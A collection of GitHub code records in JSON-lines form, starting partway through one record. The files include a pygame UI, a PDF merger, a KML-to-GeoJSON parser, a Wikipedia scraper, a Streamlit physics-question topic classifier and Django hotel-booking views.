pygame.image.load(\"UI/\" + name + \".png\")\n\n def SzeneLaden(self, name):\n self.SzenenTitel = name\n\n def draw(self, screen: pygame.Surface, frame):\n # Rahmen\n Size = pygame.display.get_surface().get_size()\n pygame.draw.rect(self.UISurface, (150, 150, 150), pygame.Rect((0, 0), Size))\n pygame.draw.rect(self.UISurface, (0, 0, 0),\n pygame.Rect((frame, frame), (Size[0] - 2 * frame, Size[1] - 2 * frame)))\n # Szenentitel\n Titelleiste = self.Schriften.render(self.SzenenTitel, False, (55, 55, 55))\n self.UISurface.blit(Titelleiste, (100, 100))\n\n # Kaptielbild\n self.UISurface.blit(pygame.transform.scale(self.KapitelLogo, (128, 64)), (0, 0))\n\n # Layer einbinden\n screen.blit(self.UISurface, (0, 0))\n","repo_name":"Kleinmergi/KnowledgeMachine2","sub_path":"UI/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"26072792414","text":"import fitz \r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\n\r\n# Função para unir dois PDFs\r\ndef merge_pdfs(pdf1_path, pdf2_path, output_path):\r\n pdf_document1 = fitz.open(pdf1_path) # Abre o primeiro PDF\r\n pdf_document2 = fitz.open(pdf2_path) # Abre o segundo PDF\r\n\r\n pdf_document1.insert_pdf(pdf_document2) # Insere o segundo PDF no primeiro\r\n\r\n pdf_document1.save(output_path) # Salva o PDF resultante\r\n pdf_document1.close()\r\n\r\n# Caminhos para os PDFs de entrada e saída\r\nmypath = r'C:\\Users\\Ander\\OneDrive\\Documentos\\JORGE_DOCUMENTOS\\GUAXUMA\\PDF_Atualizados_2'\r\npasta_pdf2 = r\"C:\\Users\\Ander\\OneDrive\\Documentos\\JORGE_DOCUMENTOS\\GUAXUMA\\PDF_Atualizados_3\"\r\npasta_geo = r\"C:\\Users\\Ander\\OneDrive\\Documentos\\JORGE_DOCUMENTOS\\GUAXUMA\\GEO\"\r\n\r\nlist_pdf = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\nlist_pdf_geo = [f for f in listdir(pasta_geo) if isfile(join(pasta_geo, f))]\r\nfor pdf in list_pdf:\r\n pdf_name = pdf\r\n if pdf_name in list_pdf_geo:\r\n 
pdf2_path = join(pasta_geo, pdf)\r\n pdf1_path = join(mypath, pdf)\r\n output_path = join(pasta_pdf2, pdf)\r\n merge_pdfs(pdf1_path, pdf2_path, output_path)\r\n\r\n else:\r\n print(pdf, 'não encontrado!')\r\n #faz uma copia do pdf e coloca na pasta 3\r\n pdf1_path = join(mypath, pdf)\r\n output_path = join(pasta_pdf2, pdf)\r\n save_pdf = fitz.open(pdf1_path)\r\n save_pdf.save(output_path)\r\n save_pdf.close()\r\n\r\n print(pdf, 'copiado com sucesso!')\r\n \r\n\r\n","repo_name":"popogis24/docx","sub_path":"geomerge.py","file_name":"geomerge.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32108665610","text":"#sending a json input to the server\ntry:\n import simplejson as json\nexcept:\n import json\n\nimport requests\n\ndef get_data():\n # sample input for polygon\n input_data = {\n 'image_1': \"FlycaptureCamera-17302268-1197932057481579794.jpg\",\n 'image_2': \"\",\n 'label_1': \"instancemask__FlycaptureCamera-17302268-1197932057481579794.jpg.json\",\n 'label_2': \"\",\n 'predicted_label': \"\",\n 'semantic_seg': 'on',\n 'bounding_box': 'off',\n\n 'image_storage':'deepenstats',\n 'image_folder':'client_images/zippy/Zippy_batch4/Clip1',\n 'private_key_cloud': '/home/marium/storage_key/DeepenAIMain-e00ba37028bf.json',\n\n 'batch_script': 'on',\n 'count_of_images': 425,\n 'instance_mask_path': \"/home/marium/Zippy/outfiles/\",\n #'deepflow_results_path': \"/home/marium/deepentools/stats/\"\n 'deepflow_results_path_on_cloud': 'Deepflow_results/client_images/Zippy/Batch4/Clip1'\n }\n return input_data\n\nurl = 'http://127.0.0.1:8000/label_checker/home/'\n\nheaders = {'content-type': 'application/json'}\nr = requests.post(url, data=json.dumps(get_data()), headers=headers)\nr.text\n\nprint(\">> completed\")","repo_name":"steve550/test","sub_path":"stats/check_polygon.py","file_name":"check_polygon.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22287787561","text":"import xml.etree.ElementTree as ET\nimport json\nimport os\nimport copy\n\n\nclass UpdateGeoJSONwithKML:\n\n def __init__(self, filename, kmldir):\n # Holds each polygon data\n self.polygon_dict = {\n \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [\n [\n ]\n ]\n },\n \"properties\": {\n \"name\": \"\"\n }\n }\n\n # Reading data back\n with open(filename, 'r') as f:\n cjson = json.load(f)\n # for each kml file, parse it and add to json\n for k in os.listdir(kmldir):\n if k.endswith(\".kml\"):\n i = ParseKMLtoGeoJSON(k)\n j = copy.deepcopy(self.polygon_dict)\n j[\"geometry\"][\"coordinates\"][0] = i.polygon\n j[\"properties\"][\"name\"] = \"BEAT \" +\\\n i.name.upper()\n print(j)\n cjson[\"features\"].append(j)\n\n # Writing JSON data\n with open(filename, 'w') as f:\n json.dump(cjson, f)\n\n\nclass ParseKMLtoGeoJSON:\n\n def __init__(self, filename):\n doc = ET.parse(filename)\n root = doc.getroot()\n self.polygon = []\n placemark = self.findPlacemark(root)\n self.name, coords = self.extractData(placemark)\n self.parseCoords(coords)\n\n def findPlacemark(self, root):\n # find the tag that holds all the data for a place\n try:\n for i in root:\n for j in i:\n if \"placemark\" in j.tag.lower():\n return j\n except Exception:\n pass\n return -1\n\n def extractData(self, placemark):\n # get the coords and name of the place\n name = \"\"\n try:\n for i in placemark:\n if \"name\" in 
i.tag.lower():\n name = i.text.lower()\n if \"linestring\" in i.tag.lower():\n for j in i:\n if \"coord\" in j.tag.lower():\n coords = j.text\n return name, coords\n except Exception:\n pass\n return -1\n\n def parseCoords(self, coords):\n # parse all the coords into geojson compatible list of coordinates for\n # a polygon\n data = coords.strip(\"\\n\\r\\t\").split(\",0 \")\n for d in data:\n t = d.split(\",\")\n if len(t) > 1:\n self.polygon.append([float(t[0]), float(t[1]), 0])\n self.polygon.append(self.polygon[0])\n\nif \"__main__\" == __name__:\n UpdateGeoJSONwithKML(\"../js/beats.geojson\", \"./\")\n","repo_name":"RakshakTalwar/vincenthpd","sub_path":"web/kml/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"25902294831","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport random\n\nURL = \"https://en.wikipedia.org/wiki/100_Greatest_African_Americans\"\n\n\ndef scrape() -> list:\n driver = webdriver.Chrome()\n driver.get(URL)\n page = driver.page_source\n\n soup = BeautifulSoup(page, \"html.parser\")\n a = soup.select(\"div > ol > li > a\")\n\n people = {}\n for link in a:\n name = link.get('title')\n href = link.get('href')\n\n if \"(\" in name:\n i = name.index('(')\n name = name[:i - 1]\n\n people[name] = href\n\n random_name = random.choice(list(people.keys()))\n\n driver.get('https://en.wikipedia.org' + people[random_name])\n person_page = driver.page_source\n person_soup = BeautifulSoup(person_page, \"html.parser\")\n paragraphs = person_soup.find_all('p')\n\n # print(person_soup)\n # print('\\n')\n\n text = ''\n for p in paragraphs:\n text = text + p.text.strip()\n text = text.replace(\"negro\", \"\")\n\n text = text[:2048]\n\n # just to initialize img_address\n img_address = (person_soup.find_all('img')[4]).get('alt')\n images = (person_soup.find_all('img'))[:8]\n\n count = 0\n for i in images:\n # find first img of person\n if random_name in i.get('alt'):\n img_address = (i.get('src'))\n break\n count += 1\n\n img_address = img_address.replace(\" \", \"_\")\n\n # print(img_address)\n # print('https:' + img_address)\n\n driver.close()\n\n # person_arr = [text, 'https://en.wikipedia.org/wiki/File:' + img_address,\n # 'https://en.wikipedia.org' + people[random_name]]\n person_arr = [text, 'https:' + img_address,\n 'https://en.wikipedia.org' + people[random_name]]\n\n # person_arr: [text, img address, link to wiki page]\n print(person_arr)\n return person_arr\n\n\nif __name__ == '__main__':\n scrape()\n","repo_name":"nykoadionisio/potd","sub_path":"src/wikiscraper.py","file_name":"wikiscraper.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"27304306867","text":"import warnings\nimport streamlit as st\nimport gc\nfrom joblib import load\nimport PIL\nfrom PIL import Image\nimport re\nimport io\nimport os\nimport cv2\nimport xgboost\nimport pytesseract\nfrom PIL import Image\nfrom pix2tex.cli import LatexOCR\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nnltk.download('punkt')\nnltk.download('stopwords')\nnltk.download('wordnet')\n\nimport keras\nimport keras.backend as 
K\nfrom keras.models import load_model\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.utils import register_keras_serializable\n\nfrom transformers import DistilBertForSequenceClassification, DistilBertTokenizerFast\nimport torch\n\n# Define SelfAttention layer\n@keras.utils.register_keras_serializable()\nclass SelfAttention(keras.layers.Layer):\n def __init__(self):\n super(SelfAttention, self).__init__()\n\n def build(self, input_shape):\n self.W = self.add_weight(name=\"att_weight\", shape=(input_shape[-1], 1), initializer=\"normal\")\n self.b = self.add_weight(name=\"att_bias\", shape=(1,), initializer=\"zeros\")\n super(SelfAttention, self).build(input_shape)\n\n def call(self, x):\n et = K.squeeze(K.dot(x, self.W), axis=-1)\n et = et + self.b\n at = K.softmax(et, axis=1)\n at = K.expand_dims(at, axis=-1)\n output = x * at\n output = K.sum(output, axis=1)\n return output\n\n def compute_output_shape(self, input_shape):\n return input_shape[0], input_shape[-1]\n\ndef ocr(image):\n img = Image.open(image)\n try:\n model = LatexOCR()\n model(img)\n except:\n primary_path = 'streamlit_gallery/utils/weights.pth'\n alternative_path = '../../utils/weights.pth'\n try:\n LatexOCR.checkpoint_path = primary_path\n except:\n LatexOCR.checkpoint_path = alternative_path\n\n # Mention the installed location of Tesseract-OCR in your system\n #for mac local\n # pytesseract.pytesseract.tesseract_cmd = '/opt/homebrew/bin/tesseract'\n #for linux cloud\n pytesseract.pytesseract.tesseract_cmd = '/usr/bin/tesseract'\n\n # Read image from which text needs to be extracted\n img = cv2.imread(image)\n\n # Preprocessing the image starts\n\n # Convert the image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n ret, thresh1 = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY_INV)\n\n rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (18, 18))\n\n # Applying dilation on the threshold image\n dilation = cv2.dilate(thresh1, rect_kernel, iterations=1)\n\n # Finding contours\n contours, hierarchy = cv2.findContours(dilation, \n cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_NONE)\n\n # Creating a copy of the image\n im2 = img.copy()\n\n # A text file is created and flushed\n file = open(\"recognized.txt\", \"w+\")\n file.write(\"\")\n file.close()\n\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n\n # Drawing a rectangle on the copied image\n rect = cv2.rectangle(im2, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n # Cropping the text block for giving input to OCR\n cropped = im2[y:y + h, x:x + w]\n\n # Open the file in append mode\n file = open(\"recognized.txt\", \"a\")\n\n # Apply OCR on the cropped image\n text = pytesseract.image_to_string(cropped)\n\n # Appending the text into the file\n file.write(text)\n file.write(\"\\n\")\n\n # Close the file\n file.close()\n\n@st.cache_data\ndef read_data(file_name: str):\n \n physics = (pd\n .read_csv(file_name)\n .drop(columns=['Unnamed: 0.1', 'Unnamed: 0', 'Subject'])\n .rename(columns={'eng': 'question'}))\n \n return (physics\n .loc[(physics.topic == \"Electric Fields\") | (physics.topic == \"Wave Motion\") | \n (physics.topic == \"Temperature and ideal Gasses\") | (physics.topic == \"Nuclear Physics\") |\n (physics.topic == \"Forces\") | (physics.topic == \"D.C. 
Circuits\") |\n (physics.topic == \"Gravitational Field\") | (physics.topic == \"Quantum Physics\")]\n .assign(processed_question=lambda df_: df_['question'].apply(preprocess_text))\n )\n\n# Function to clean and preprocess text\ndef preprocess_text(text):\n # Remove newline characters\n text = text.replace('\\n', ' ')\n \n # Lowercase the text\n text = text.lower()\n \n # Remove numbers and punctuation\n text = re.sub('[^a-zA-Z]', ' ', text)\n \n # Tokenize\n words = word_tokenize(text)\n \n # Remove stopwords\n words = [word for word in words if word not in stopwords.words('english')]\n \n # Remove single-character words (like 'a', 'b', 'c')\n words = [word for word in words if len(word) > 1]\n \n # Lemmatize\n lemmatizer = WordNetLemmatizer()\n words = [lemmatizer.lemmatize(word) for word in words]\n \n # Join words back into a string\n text = ' '.join(words)\n \n return text\n\n@st.cache_resource\ndef load_vectorizer():\n primary_path = 'streamlit_gallery/utils/tfidf_vectorizer.joblib'\n alternative_path = '../../utils/tfidf_vectorizer.joblib'\n \n try:\n return load(primary_path)\n except FileNotFoundError:\n try:\n return load(alternative_path)\n except FileNotFoundError:\n raise Exception(\"Vectorizer not found in both primary and alternative directories!\")\n\n@st.cache_resource\ndef load_model_xgb():\n primary_path = 'streamlit_gallery/utils/best_model_physics_xgboost.joblib'\n alternative_path = '../../utils/best_model_physics_xgboost.joblib'\n \n try:\n return load(primary_path)\n except FileNotFoundError:\n try:\n return load(alternative_path)\n except FileNotFoundError:\n raise Exception(\"Model not found in both primary and alternative directories!\")\n\n@st.cache_resource \ndef load_model_logreg():\n primary_path = 'streamlit_gallery/utils/best_model_physics_logreg.joblib'\n alternative_path = '../../utils/best_model_physics_logreg.joblib'\n \n try:\n return load(primary_path)\n except FileNotFoundError:\n try:\n return load(alternative_path)\n except FileNotFoundError:\n raise Exception(\"Model not found in both primary and alternative directories!\")\n\n@st.cache_resource \ndef load_model_svc():\n primary_path = 'streamlit_gallery/utils/best_model_physics_svc.joblib'\n alternative_path = '../../utils/best_model_physics_svc.joblib'\n \n try:\n return load(primary_path)\n except FileNotFoundError:\n try:\n return load(alternative_path)\n except FileNotFoundError:\n raise Exception(\"Model not found in both primary and alternative directories!\")\n\n@st.cache_resource\ndef load_model_lstm_attention():\n \n primary_path = 'streamlit_gallery/utils/best_model_physics_lstm_attention_legacy.h5'\n alternative_path = '../../utils/best_model_physics_lstm_attention_legacy.h5'\n \n try:\n # return load_model(primary_path, \n # custom_objects={'SelfAttention': SelfAttention})\n # model_new = load(primary_path)\n # model_new.__class__.SelfAttention = SelfAttention\n \n model_new = load_model(primary_path)\n return model_new\n except FileNotFoundError:\n try:\n # return load_model(alternative_path, \n # custom_objects={'SelfAttention': SelfAttention})\n # model_new = load(alternative_path)\n # model_new.__class__.SelfAttention = SelfAttention\n \n model_new = load_model(alternative_path)\n return model_new\n except FileNotFoundError:\n raise Exception(\"Model not found in both primary and alternative directories!\")\n \ndef preprocess_lstm(df, new_text):\n \n X = df['processed_question'].values\n y = df['topic'].values\n \n tokenizer = Tokenizer(num_words=5000)\n 
tokenizer.fit_on_texts(X)\n \n X = tokenizer.texts_to_sequences(X)\n maxlen = 100\n X = pad_sequences(X, padding='post', maxlen=maxlen)\n \n new_text = tokenizer.texts_to_sequences([new_text])\n new_text = pad_sequences(new_text, padding='post', maxlen=maxlen)\n \n return new_text\n\n# @st.cache_resource \n# def load_model_bert():\n \n# primary_path = 'streamlit_gallery/utils/best_model_physics_bert.h5'\n# alternative_path = '../../utils/best_model_physics_bert.h5'\n \n# loaded_model = DistilBertForSequenceClassification.from_pretrained('distilbert-base-uncased', num_labels=8)\n \n# try:\n# loaded_model.load_state_dict(torch.load(primary_path, map_location=torch.device('cpu')), strict=False)\n# return loaded_model\n# except FileNotFoundError:\n# try:\n# loaded_model.load_state_dict(torch.load(alternative_path, map_location=torch.device('cpu')), strict=False)\n# return loaded_model\n# except FileNotFoundError:\n# raise Exception(\"Model not found in both primary and alternative directories!\")\n\n# def preprocess_bert(new_text):\n# # Tokenizer\n# tokenizerx = DistilBertTokenizerFast.from_pretrained('distilbert-base-uncased')\n# user_input_encodings = tokenizerx(preprocess_text(new_text), truncation=True, padding=True, return_tensors='pt')\n# return user_input_encodings\n\ndef get_label_mapping():\n \n labelencoder = load('labelencoder_physics.joblib')\n return labelencoder\n\ndef make_prediction_hard_vote(loaded_models, \n input_data, \n label_mapping):\n \n predictions = []\n predictions.append(loaded_models[0].predict(input_data[0]))\n predictions.append(loaded_models[1].predict(input_data[0]))\n predictions.append(loaded_models[2].predict(input_data[0]))\n predictions.append([np.argmax(loaded_models[3].predict(input_data[1]))])\n # with torch.no_grad():\n # output = loaded_models[4](**input_data[2])\n # logits = output.logits\n # predicted_class = torch.argmax(logits, dim=1).item()\n # predictions.append([predicted_class])\n \n final_prediction = stats.mode(predictions, axis=0, keepdims=True)[0]\n return label_mapping.inverse_transform(final_prediction[0])\n\n\n# def navigate_to_recommendation():\n# st.experimental_set_query_params(p=\"recommendation\")\n \ndef main():\n \n gc.enable()\n \n os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n \n df = read_data(\"Subject/Physics/physics_labelled_updated.csv\")\n \n # Title of the app\n st.subheader('Input Options')\n\n # Create tabs for image upload and text input\n tab1, tab2 = st.tabs([\"🖼️ Image Upload\", \"✍️ Enter Text\"])\n \n result = None\n uploaded_file = None\n user_input_text = None\n \n # Initialization\n if 'result' not in st.session_state:\n st.session_state['result'] = None\n \n with tab1:\n st.subheader(\"Image Upload\")\n \n # File uploader allows user to add file\n uploaded_file = st.file_uploader(\"Upload an image...\", type=['jpg', 'jpeg', 'png'])\n ###\n st.markdown(\"**Not sure what to upload?** Why not try these sample questions?\")\n \n col_sampleA, col_sampleB = st.columns(2)\n with col_sampleA:\n st.image(Image.open('streamlit_gallery/components/introduction/Forces 3.png'), caption='Sample Question 1', use_column_width=True)\n \n if st.button(\"Select\", key=\"sampleA\"):\n uploaded_file = Image.open(\"streamlit_gallery/components/introduction/Forces 3.png\")\n\n with col_sampleB:\n st.image(Image.open(\"streamlit_gallery/components/introduction/Quantum Physics 2.png\"), caption='Sample Question 2', use_column_width=True)\n \n if st.button(\"Select\", key=\"sampleB\"):\n uploaded_file = 
Image.open(\"streamlit_gallery/components/introduction/Quantum Physics 2.png\")\n \n st.divider()\n \n ###\n if uploaded_file is not None:\n # To read file as bytes:\n \n if isinstance(uploaded_file, PIL.Image.Image):\n image = uploaded_file\n file_extension = \".png\"\n \n else:\n bytes_data = uploaded_file.getvalue()\n \n # To convert to a PIL Image object (if the file is an image)\n image = Image.open(io.BytesIO(bytes_data)) \n file_extension = os.path.splitext(uploaded_file.name)[1]\n \n image_path = f\"image{file_extension}\"\n image.save(image_path)\n \n # Display the image\n st.image(image, caption='Uploaded Image.', use_column_width=True)\n \n # Call the OCR function or whatever processing you need\n ocr('image.png')\n\n st.subheader('Extracted Text')\n # Display the recognized text\n result = open(\"recognized.txt\", \"r\").read()\n st.write(result)\n st.session_state['result'] = result\n # uploaded_file = None\n \n hard_vote_prediction_result = make_prediction_hard_vote(loaded_models=[load_model_xgb(),\n load_model_logreg(),\n load_model_svc(),\n load_model_lstm_attention(),\n # load_model_bert(),\n ],\n input_data=[load_vectorizer().transform([preprocess_text(result)]),\n preprocess_lstm(df, preprocess_text(result)),\n # preprocess_bert(result)\n ],\n label_mapping=get_label_mapping())\n\n \n st.subheader(f\"Predicted Topic: {hard_vote_prediction_result[0]}\")\n st.session_state[\"predicted_topics\"] = hard_vote_prediction_result[0]\n # st.write(\"Need practice? Check out questions similar to this!\")\n \n # Define your button and assign the navigation function to it\n # practice_button = st.button(\"Practice!\", key=\"practice_button1\")\n\n # if practice_button:\n # Navigate to the recommendation page\n # navigate_to_recommendation()\n # Force a rerun of the script to reflect the query parameter change\n # st.rerun()\n \n else:\n st.warning(\"Please upload an image or enter text to get started!\")\n\n with tab2:\n st.header(\"Text Input\")\n \n user_input_text = st.text_area(\"Enter your text here...\")\n \n if user_input_text != \"\":\n uploaded_file = None\n result = user_input_text\n st.subheader('Your Text')\n st.write(result)\n st.session_state['result'] = result\n \n hard_vote_prediction_result = make_prediction_hard_vote(loaded_models=[load_model_xgb(),\n load_model_logreg(),\n load_model_svc(),\n load_model_lstm_attention(),\n # load_model_bert(),\n ],\n input_data=[load_vectorizer().transform([preprocess_text(result)]),\n preprocess_lstm(df, preprocess_text(result)),\n # preprocess_bert(result)\n ],\n label_mapping=get_label_mapping())\n\n \n st.subheader(f\"Predicted Topic: {hard_vote_prediction_result[0]}\")\n st.session_state[\"predicted_topics\"] = hard_vote_prediction_result[0]\n # st.write(\"Need practice? 
Check out questions similar to this!\")\n \n # Define your button and assign the navigation function to it\n # practice_button = st.button(\"Practice!\", key=\"practice_button2\")\n\n # if practice_button:\n # Navigate to the recommendation page\n # navigate_to_recommendation()\n # Force a rerun of the script to reflect the query parameter change\n # st.rerun()\n \n else:\n st.warning(\"Please upload an image or enter text to get started!\")\n \n gc.collect()\n\nif __name__ == \"__main__\":\n main()","repo_name":"AndreasL7/DBA4813AI","sub_path":"streamlit_gallery/components/introduction/introduction.py","file_name":"introduction.py","file_ext":"py","file_size_in_byte":17795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41839269942","text":"current_users = ['John', 'stevie', 'Tropicana', 'true Clear', 'Beebee']\nnew_users = ['Mike', 'Hawk', 'Bumble', 'Tropicana', 'Stevie']\n\nlowerList = [item.lower() for item in current_users]\nprint(lowerList)\n\nfor user in new_users:\n if user.lower() in lowerList:\n print(f\"{user.lower()}, please enter a new username\")\n else:\n print(f\"{user}, username is available\")\n","repo_name":"isaacj96/python_crash_course","sub_path":"chapter_five/Try_it_yourself/5-10_checking_users.py","file_name":"5-10_checking_users.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"262925673","text":"import argparse\n\nimport config\nfrom bulk_process_shots import bulk_process_shots\nfrom bulk_restore_backups import bulk_restore_backups\nfrom logs import log, set_level\n\n\ndef main():\n\tparser = argparse.ArgumentParser(description='Bulk processing of shots or restoring backups')\n\tparser.add_argument('-restore', '-r', action='store_true', help='Restore backups instead of processing shots')\n\tparser.add_argument('-shots', '-s', help='Path to SHOTS directory')\n\tparser.add_argument('-move_assets', '-a', action='store_true', help='Move assets to PLATES directory')\n\tparser.add_argument('-loglevel', '-l', help='Set the log level (DEBUG, INFO, WARNING, ERROR, CRITICAL)')\n\targs = parser.parse_args()\n\n\tshould_move_assets = args.move_assets or False\n\n\tif args.loglevel:\n\t\tconfig.log_level = args.loglevel\n\t\tset_level(args.loglevel)\n\n\tif args.shots:\n\t\tshots_dir_path = args.shots\n\t\tif args.restore:\n\t\t\tbulk_restore_backups(shots_dir_path)\n\t\telse:\n\t\t\tbulk_process_shots(shots_dir_path, should_move_assets)\n\telse:\n\t\tlog(\"Please provide a path to the SHOTS directory with -shots=PATH_TO_SHOTS\", 'ERROR')\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"olegkron/kfx_BulkRelativePaths","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"3420033413","text":"from django.shortcuts import render\nfrom django import forms\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom .models import *\nfrom django.forms import ModelForm\nfrom django.contrib.auth.decorators import login_required\nimport datetime\n\ndef date_validator(value):\n if value < datetime.datetime.now().date():\n raise forms.ValidationError('invalid', code = 'invalid')\n \nclass SelectDateForm(forms.Form):\n\n def clean_date_out(self):\n date_in = self.data['date_in']\n date_out = self.data['date_out']\n if date_in > 
date_out:\n raise forms.ValidationError(\"Некоректная дата\")\n return date_out\n\n date_in = forms.DateField(label = 'Дата въезда', validators = [date_validator],error_messages = {'invalid' : 'Введите корректную дату'})\n date_out = forms.DateField(label = 'Дата выезда')\n\n@login_required(login_url = '/login/')\ndef recordView(request, id = None):\n if id == None:\n return HttpResponseRedirect('/records/')\n return render(request, 'record_view.html',{'record': Record.objects.get(pk = id)})\n \n@login_required(login_url = '/login/')\ndef listRecords(request):\n sql = '''SELECT *\n\tfrom management_record, management_room\n where\n management_record.room_id = management_room.id\n and (\n\t (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\n\tor\n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\t \n\tor \n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out <= %s)\n or\n (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out > %s and management_record.date_out <= %s))'''\n form = SelectDateForm(request.POST or None)\n form.fields['date_in'] = forms.DateField(label = 'Дата въезда')\n context = {'form': form}\n if request.method == 'POST' and form.is_valid():\n date_in = str(form.cleaned_data['date_in'])\n date_out = str(form.cleaned_data['date_out'])\n context['records'] = Record.objects.raw(sql,[date_in, date_out]*8)\n return render(request, 'list_records.html',context)\n\n@login_required(login_url = '/login/')\ndef listRooms(request):\n sql = \"\"\"\n SELECT \n management_room.number, management_room.id, management_tariff.name as tariff_name, management_tariff.units,\n management_valuta.name as valuta_name\n from \n management_room, management_tariff, management_valuta\n where\n management_room.tariff_id = management_tariff.id\n and\n management_room.id Not In\n (SELECT management_record.room_id \n\tfrom management_record \n where \n\t (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\n\tor\n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out >= %s)\t \n\tor \n\t (management_record.date_in <= %s and management_record.date_in <= %s\n and management_record.date_out >= %s and management_record.date_out <= %s)\n or\n (management_record.date_in >= %s and management_record.date_in <= %s\n and management_record.date_out > %s and management_record.date_out <= %s))\n \"\"\"\n form = SelectDateForm(request.POST or None)\n context = {'form': form}\n if request.method == 'POST' and form.is_valid(): \n date_in = form.cleaned_data['date_in']\n date_out = form.cleaned_data['date_out']\n rooms = Room.objects.raw(sql,[str(date_in), str(date_out)]*8)\n context['form'] = form\n context['rooms'] = rooms\n context['date_in'] = str(date_in)\n context['date_out'] = str(date_out)\n else:\n context['rooms'] = None\n return render(request, 'list_rooms.html',context)\n\ndef check_dates(date_in, date_out):\n sql = '''SELECT \n count(management_room.id)\n from \n management_room\n where \n management_room.id Not In\n (SELECT management_record.room_id \n\tfrom management_record \n where \n\t 
(management_record.date_in >= %s and management_record.date_in <= %s\n        and management_record.date_out >= %s and management_record.date_out >= %s)\n\tor\n\t    (management_record.date_in <= %s and management_record.date_in <= %s\n        and management_record.date_out >= %s and management_record.date_out >= %s)\t \n\tor \n\t    (management_record.date_in <= %s and management_record.date_in <= %s\n        and management_record.date_out >= %s and management_record.date_out <= %s)\n    or\n        (management_record.date_in >= %s and management_record.date_in <= %s\n        and management_record.date_out >= %s and management_record.date_out <= %s))\n    '''\n    from django.db import connection, transaction\n    cursor = connection.cursor()\n    cursor.execute(sql, [date_in, date_out]*8)\n    is_free = bool(cursor.fetchone()[0])\n    return is_free\n\nclass RecordForm(ModelForm):\n\n    def series_validator(value):\n        if len(str(value)) != 4:\n            raise forms.ValidationError('invalid', code = 'invalid')\n\n    def passport_id_validator(value):\n        if len(str(value)) != 6:\n            raise forms.ValidationError('invalid', code = 'invalid')\n\n    def clean_date_in(self):\n        date_in = str(self.cleaned_data['date_in'])\n        date_out = str(self.data['date_out'])\n        print(date_in)\n        if not check_dates(date_in, date_out):\n            raise forms.ValidationError(\"The room is already booked for these dates\")\n        return date_in\n\n    def clean_date_out(self):\n        date_in = self.data['date_in']\n        date_out = self.data['date_out']\n        if date_in > date_out:\n            raise forms.ValidationError(\"Invalid date\")\n        return date_out\n    \n\n    passport_series = forms.IntegerField(label = 'Passport series', validators = [series_validator],error_messages = {'invalid' : 'Invalid passport series','required' : 'This field is required',})\n    passport_id = forms.IntegerField(label = 'Passport number', validators = [passport_id_validator],error_messages = {'invalid' : 'Invalid passport number', 'required' : 'This field is required'})\n    date_in = forms.DateField(label = 'Check-in date', validators = [date_validator], error_messages = {'invalid' : 'Invalid date'})\n\n    class Meta:\n        model = Record\n        fields = ['first_name',\n                  'middle_name',\n                  'last_name',\n                  'country',\n                  'city',\n                  'passport_series',\n                  'passport_id',\n                  'issued',\n                  'date_of_birth',\n                  'date_in',\n                  'date_out',]\n    \n@login_required(login_url = '/login/')\ndef record(request, id_room = None,date_in = None,date_out = None):\n    if id_room == None:\n        return HttpResponseRedirect('/rooms')\n    room = Room.objects.get(pk = id_room)\n    total = room.tariff.units\n    record = Record(room = room, total = total,date_in = date_in, date_out = date_out)\n    form = RecordForm(request.POST or None, instance = record)\n    if request.method == 'POST' and form.is_valid():\n        form.save()\n        return render(request,'msg.html',{})\n    return render(request, 'register.html', {'form' : form})\n\nclass PaymentForm(ModelForm):\n    class Meta:\n        model = Additional_payment\n        fields = '__all__'\n\n@login_required(login_url = '/login/')\ndef add_payment(request):\n    form = PaymentForm(request.POST or None)\n    if request.method == 'POST' and form.is_valid():\n        record = form.cleaned_data['record']\n        record.total += form.cleaned_data['service'].price * form.cleaned_data['size']\n        record.save()\n        form.save()\n     